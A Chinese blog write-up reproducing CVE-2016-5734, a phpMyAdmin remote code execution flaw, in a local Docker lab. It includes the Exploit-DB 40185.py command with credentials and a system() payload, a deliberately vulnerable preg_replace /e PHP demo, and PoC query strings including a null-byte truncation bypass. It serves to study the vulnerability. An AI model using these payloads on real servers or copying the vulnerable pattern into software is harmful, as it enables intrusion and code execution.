漏洞简介
Phpmyadmin是一个以php为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可以使用Web接口管理MySQL数据库。
借由次Web接口可以成为一个简单方式输入SQL语法的较佳途径。其优势就是可以通过Web界面来远程管理方便建立、修改、删除数据库及资料表
影响版本
利用条件:需要知道数据库账号密码
Phpmyadmin -> 4.0.10.16之前的4.0.x版本
4.4.15.7 之前的 4.4.x版本
4.6.3之前的 4.6.x版本
Php版本: 4.3.0 ~5.4.6
Php 5.0 版本以上的将 preg_replace 的 /e修饰符给废弃掉了
环境搭建
攻击机kali:192.168.117.129
靶机IP:192.168.117.128
靶机环境: kali
使用的是Docker + Docker-compose 开源项目vulhub
启动命令:docker-compose up -d
查看是否启动:docker ps
(默认的映射端口是8081,我改成了8081)
复现过程
先访问一下网站(账号是root,密码是root)
我们用kali自带的searchsploit工具搜索漏洞。
命令:
searchsploit phpmyadmin
sudo find / -name 40185.py
进入该文件夹,查看该文件
cd /usr/share/exploitdb/exploits/php/webapps/ && cat 40185.py
这里写有该脚本的用法。
--pwd,后填上phpmyadmin的密码
-c,后面是要执行的php代码
exp利用:
python3 40185.py -u root --pwd="root" http://192.168.117.128:8081 -c "system('ls');"
漏洞成因
preg_replace函数:
preg_replace 函数执行一个正则表达式的搜索和替换。
preg_replace \e 的作用:
如果设置了这个被弃用的修饰符, preg_replace() 在进行了对替换字符串的 后向引用替换之后, 将替换后的字符串作为php 代码评估执行(eval 函数方式),并使用执行结果 作为实际参与替换的字符串。单引号、双引号、反斜线()和 NULL 字符在 后向引用替换时会被用反斜线转义.
preg_replace漏洞触发有两个前提:
01:第一个参数需要e标识符,有了它可以执行第二个参数的命令
02:第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令。
测试一下利用\e实现代码执行:
<?php highlight_file(__FILE__); $raw = $_GET['raw']; $replace = $_GET['replace']; $text = $_GET['text']; $text = preg_replace('/'.$raw.'/e', $replace, $text); ?>
poc:
?raw=a&replace=system("ls")&text=larry
如果我们的demo变成了如下的代码,还会有漏洞吗?
<?php highlight_file(__FILE__); $raw = $_GET['raw']; $replace = $_GET['replace']; $text = $_GET['text']; $text = preg_replace('/'.$raw.'/i', $replace, $text); ?>
其实还是可以绕过的,当php版本小于5.4.7时,向pattern中注入空字符产生截断,并传入e修饰符,依照能照成php代码执行。
poc:
?raw=a/e%00&replace=system(%22ls%22)&text=larry
出处:CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现_丶没胡子的猫-CSDN博客